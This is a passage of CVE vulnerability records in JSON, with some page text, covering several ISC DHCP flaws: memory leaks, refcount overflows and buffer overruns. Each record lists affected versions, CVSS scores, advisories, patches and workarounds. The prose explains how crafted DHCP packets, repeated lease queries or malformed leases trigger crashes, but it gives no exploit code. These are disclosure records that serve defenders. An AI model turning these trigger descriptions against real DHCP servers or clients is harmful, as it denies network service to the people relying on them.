"version": "1.0 through versions before 4.1-ESV-R16-P2"
},
{
"status": "affected",
"version": "4.2 through versions before 4.4.3.-P1"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue."
}
],
"datePublic": "2022-10-05T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "In ISC DHCP 1.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory."
}
],
"exploits": [
{
"lang": "en",
"value": "We are not aware of any active exploits."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "The function fqdn_universe_decode() allocates buffer space for the contents of option 81 (fqdn) data received in a DHCP packet. The maximum length of a DNS label is 63 bytes. The function tests the length byte of each label contained in the fqdn; if it finds a label whose length byte value is larger than 63, it returns without dereferencing the buffer space. This will cause a memory leak. Affects In ISC DHCP 1.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-03T00:00:00.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"url": "https://kb.isc.org/docs/cve-2022-2929"
},
{
"name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
},
{
"name": "FEDORA-2022-f5a45757df",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
},
{
"name": "FEDORA-2022-9ca9a94e28",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
},
{
"name": "FEDORA-2022-c4f274a54f",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of ISC DHCP. These can all be downloaded from https://www.isc.org/downloads. 4.4.3-P1 4.1-ESV-R16-P2"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "DHCP memory leak",
"workarounds": [
{
"lang": "en",
"value": "As exploiting this vulnerability requires an attacker to send packets for an extended period of time, restarting servers periodically could be a viable workaround."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2022-2929",
"datePublished": "2022-10-07T04:45:12.836Z",
"dateReserved": "2022-08-22T00:00:00.000Z",
"dateUpdated": "2024-09-16T18:28:37.665Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2928 (GCVE-0-2022-2928)
Vulnerability from cvelistv5 – Published: 2022-10-07 04:45 – Updated: 2024-09-17 00:21
VLAI?
Title
An option refcount overflow exists in dhcpd
Summary
In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option's refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort.
Severity ?
6.5 (Medium)
CWE
- A DHCP server configured with allow leasequery;, a remote machine with access to the server can send lease queries for the same lease multiple times, leading to the add_option() function being repeatedly called. This could cause an option's refcount field to overflow and the server to abort. Internally, reference counters are integers and thus overflow at 2^31 references, so even at 1000 lease query responses per second, it would take more than three weeks to crash the server. Affects In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
Date Public ?
2022-10-05 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:53:00.326Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://kb.isc.org/docs/cve-2022-2928"
},
{
"name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
},
{
"name": "FEDORA-2022-f5a45757df",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
},
{
"name": "FEDORA-2022-9ca9a94e28",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
},
{
"name": "FEDORA-2022-c4f274a54f",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
"version": "4.4.0 through versions before 4.4.3-P1"
},
{
"status": "affected",
"version": "4.1 ESV 4.1-ESV-R1 through versions before 4.1-ESV-R16-P1"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue."
}
],
"datePublic": "2022-10-05T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "In ISC DHCP 4.4.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option\u0027s refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort."
}
],
"exploits": [
{
"lang": "en",
"value": "We are not aware of any active exploits."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "A DHCP server configured with allow leasequery;, a remote machine with access to the server can send lease queries for the same lease multiple times, leading to the add_option() function being repeatedly called. This could cause an option\u0027s refcount field to overflow and the server to abort. Internally, reference counters are integers and thus overflow at 2^31 references, so even at 1000 lease query responses per second, it would take more than three weeks to crash the server. Affects In ISC DHCP 4.4.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-03T00:00:00.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"url": "https://kb.isc.org/docs/cve-2022-2928"
},
{
"name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
},
{
"name": "FEDORA-2022-f5a45757df",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
},
{
"name": "FEDORA-2022-9ca9a94e28",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
},
{
"name": "FEDORA-2022-c4f274a54f",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of ISC DHCP. These can all be downloaded from https://www.isc.org/downloads. 4.4.3-P1 4.1-ESV-R16-P2"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "An option refcount overflow exists in dhcpd",
"workarounds": [
{
"lang": "en",
"value": "Disable lease query on the server for DHCPv4 or restart the server periodically."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2022-2928",
"datePublished": "2022-10-07T04:45:11.751Z",
"dateReserved": "2022-08-22T00:00:00.000Z",
"dateUpdated": "2024-09-17T00:21:40.167Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-25217 (GCVE-0-2021-25217)
Vulnerability from cvelistv5 – Published: 2021-05-26 22:10 – Updated: 2024-09-16 22:08
VLAI?
Title
A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient
Summary
In ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted.
Severity ?
7.4 (High)
CWE
- Program code used by the ISC DHCP package to read and parse stored leases has a defect that can be exploited by an attacker to cause one of several undesirable outcomes, depending on the component attacked and the way in which it was compiled. Because of a discrepancy between the code which handles encapsulated option information in leases transmitted "on the wire" and the code which reads and parses lease information after it has been written to disk storage, it is potentially possible for an attacker to deliberately cause a situation where: dhcpd, while running in DHCPv4 or DHCPv6 mode, or dhclient, the ISC DHCP client implementation will attempt to read a stored lease that contains option information which will trigger a bug in the option parsing code. Affects ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2. Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability. Affects both dhcpd (server) and dhcpcd (client).
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
Date Public ?
2021-05-26 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T19:56:11.067Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://kb.isc.org/docs/cve-2021-25217"
},
{
"name": "[oss-security] 20210526 ISC has disclosed a vulnerability in ISC DHCP (CVE-2021-25217)",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
},
{
"name": "FEDORA-2021-08cdb4dc34",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LB42JWIV4M4WDNXX5VGIP26FEYWKIF/"
},
{
"name": "[debian-lts-announce] 20210603 [SECURITY] [DLA 2674-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
},
{
"name": "FEDORA-2021-8ca8263bde",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5QI4DYC7J4BGHEW3NH4XHMWTHYC36UK4/"
},
{
"tags": [
"x_transferred"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
},
{
"tags": [
"x_transferred"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"lessThan": "4.1-ESV-R16-P1",
"status": "affected",
"version": "4.1 ESV",
"versionType": "custom"
},
{
"lessThan": "4.4.2-P1",
"status": "affected",
"version": "4.4",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank Jon Franklin from Dell and Pawel Wieczorkiewicz from Amazon Web Services for (independently) reporting this vulnerability."
}
],
"datePublic": "2021-05-26T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "In ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted."
}
],
"exploits": [
{
"lang": "en",
"value": "We are not aware of any active exploits."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Program code used by the ISC DHCP package to read and parse stored leases has a defect that can be exploited by an attacker to cause one of several undesirable outcomes, depending on the component attacked and the way in which it was compiled. Because of a discrepancy between the code which handles encapsulated option information in leases transmitted \"on the wire\" and the code which reads and parses lease information after it has been written to disk storage, it is potentially possible for an attacker to deliberately cause a situation where: dhcpd, while running in DHCPv4 or DHCPv6 mode, or dhclient, the ISC DHCP client implementation will attempt to read a stored lease that contains option information which will trigger a bug in the option parsing code. Affects ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2. Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability. Affects both dhcpd (server) and dhcpcd (client).",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-03T00:00:00.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"url": "https://kb.isc.org/docs/cve-2021-25217"
},
{
"name": "[oss-security] 20210526 ISC has disclosed a vulnerability in ISC DHCP (CVE-2021-25217)",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
},
{
"name": "FEDORA-2021-08cdb4dc34",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LB42JWIV4M4WDNXX5VGIP26FEYWKIF/"
},
{
"name": "[debian-lts-announce] 20210603 [SECURITY] [DLA 2674-1] isc-dhcp security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
},
{
"name": "FEDORA-2021-8ca8263bde",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5QI4DYC7J4BGHEW3NH4XHMWTHYC36UK4/"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
},
{
"url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of ISC DHCP:\n\n ISC DHCP 4.1-ESV-R16-P1\n ISC DHCP 4.4.2-P1"
}
],
"source": {
"discovery": "USER"
},
"title": "A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient",
"workarounds": [
{
"lang": "en",
"value": "None known."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2021-25217",
"datePublished": "2021-05-26T22:10:11.312Z",
"dateReserved": "2021-01-15T00:00:00.000Z",
"dateUpdated": "2024-09-16T22:08:32.175Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-5732 (GCVE-0-2018-5732)
Vulnerability from cvelistv5 – Published: 2019-10-09 14:17 – Updated: 2024-09-16 18:19
VLAI?
Title
A specially constructed response from a malicious server can cause a buffer overflow in dhclient
Summary
Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0
Severity ?
7.5 (High)
CWE
- Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur.
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
Date Public ?
2018-02-28 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T05:40:51.169Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/docs/aa-01565"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
"version": "ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
}
],
"datePublic": "2018-02-28T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-09T14:17:14.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/docs/aa-01565"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of DHCP. ISC DHCP releases are available from https://www.isc.org/downloads.\n\n \u003e= DHCP 4.1-ESV-R15-P1\n \u003e= DHCP 4.3.6-P1\n \u003e= DHCP 4.4.1"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "A specially constructed response from a malicious server can cause a buffer overflow in dhclient",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-officer@isc.org",
"DATE_PUBLIC": "2018-02-28T00:00:00.000Z",
"ID": "CVE-2018-5732",
"STATE": "PUBLIC",
"TITLE": "A specially constructed response from a malicious server can cause a buffer overflow in dhclient"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ISC DHCP",
"version": {
"version_data": [
{
"version_name": "ISC DHCP",
"version_value": "4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
}
}
]
},
"vendor_name": "ISC"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.isc.org/docs/aa-01565",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/docs/aa-01565"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of DHCP. ISC DHCP releases are available from https://www.isc.org/downloads.\n\n \u003e= DHCP 4.1-ESV-R15-P1\n \u003e= DHCP 4.3.6-P1\n \u003e= DHCP 4.4.1"
}
],
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2018-5732",
"datePublished": "2019-10-09T14:17:14.251Z",
"dateReserved": "2018-01-17T00:00:00.000Z",
"dateUpdated": "2024-09-16T18:19:36.136Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-5733 (GCVE-0-2018-5733)
Vulnerability from cvelistv5 – Published: 2019-01-16 20:00 – Updated: 2025-04-25 23:02
VLAI?
Title
A malicious client can overflow a reference counter in ISC dhcpd
Summary
A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0.
Severity ?
5.9 (Medium)
CWE
- Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients.
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
Date Public ?
2018-02-28 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-04-25T23:02:52.084Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/docs/aa-01567"
},
{
"name": "RHSA-2018:0469",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0469"
},
{
"name": "DSA-4133",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "USN-3586-2",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "https://usn.ubuntu.com/3586-2/"
},
{
"name": "RHSA-2018:0483",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0483"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "103188",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/103188"
},
{
"name": "1040437",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1040437"
},
{
"name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
